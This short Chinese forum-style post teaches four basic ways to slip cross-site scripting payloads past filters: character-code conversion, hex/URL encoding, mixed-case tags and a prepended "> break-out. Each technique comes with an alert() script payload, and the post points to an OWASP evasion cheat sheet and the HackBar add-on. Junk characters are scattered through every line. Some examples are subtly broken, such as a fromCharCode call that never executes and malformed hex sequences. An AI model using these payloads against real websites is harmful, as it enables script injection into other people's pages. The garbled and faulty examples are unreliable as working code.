四种超级基础的绕过方法。) x& g1 m: b( b7 [
1.转换为ASCII码
' E+ z& D- R8 v9 P1 m例子:原脚本为<script>alert(‘I love F4ck’)</script >6 S) _* D1 [5 B n# i. G" ^( x. i
通过转换,变成:2 w' Q4 q% |* [- K. d% X
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>/ l: g4 P' X4 l6 z P
0 Z+ f9 ^3 V9 j2.转换为HEX(十六进制)& c. _5 J6 v- L( J4 d
例子:原脚本为<script>alert(‘I love F4ck’)</script>
" W+ j/ z. [7 Z! k+ b$ N通过转换,变成:8 W. h1 K0 ~! T; V4 v: m, Y! P
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
: Q2 K- }4 P6 J3 [( h : P4 q1 w& ~* ^2 j
3.转换脚本的大小写
6 u4 ~9 Q9 a- D8 ]; l例子:原脚本为<script>alert(‘I love F4ck’)</script>+ U m# D% Y. K7 d/ v
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
- d0 V. C( f I( Q% C ( E# T+ k9 f- Y: k& X3 k$ t; v
4.增加闭合标记”>
( q5 p/ \* [& i& \8 K例子:原脚本为<script>alert(‘I love F4ck’)</script>
' u! p" t w/ G% o# `* w0 r转换为:”><script>alert(‘I love F4ck’)</script>
( p; @1 w1 y$ h更详细绕过技术请参考此网页8 I6 E6 ?0 I. ]- K9 R8 t
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
, v- y5 H- b" m0 B3 }+ z2 q
9 C2 d4 @! P3 x7 v5 ~转换工具使用的是火狐的 hackbar mozilla addon. |